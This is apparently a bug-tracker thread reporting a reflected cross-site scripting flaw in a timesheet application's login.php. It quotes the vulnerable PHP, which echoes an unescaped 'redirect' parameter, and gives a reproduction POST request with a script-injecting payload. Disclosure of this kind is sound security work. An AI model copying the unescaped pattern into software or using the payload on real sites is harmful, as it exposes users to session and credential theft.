Menu

Cross-site Scripting (XSS) vulnerability in login form

2019-02-17
2019-02-17
  • Miikka Värri

    Miikka Värri - 2019-02-17

    There's a cross-site scripting vulnerability in login form that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter.

    Version: <=1.5.3

    https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40
    https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l54

    $redirect = isset($_REQUEST["redirect"]) ? $_REQUEST["redirect"] : "";
    
    ?>
    
    <html>
    <head>
    <title>Timesheet Login</title>
    <?php
    include ("header.inc");
    ?>
    </head>
    <body onLoad="document.loginForm.username.focus();">
    
    <form action="login.php" method="POST" name="loginForm" style="margin: 0px;">
    <input type="hidden" name="redirect" value="<?php echo $redirect; ?>" />
    
     
  • Miikka Värri

    Miikka Värri - 2019-02-17

    To reproduce:

    POST /login.php HTTP/1.1
    Host: localhost
    Content-Length: 108
    Cache-Control: max-age=0
    Origin: http://localhost
    Upgrade-Insecure-Requests: 1
    DNT: 1
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://localhost/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fi;q=0.7
    Connection: close
    
    redirect="/><script>alert("XSS")</script><input style="display:none&username=some&password=some&Login=submit
    
     

Log in to post a comment.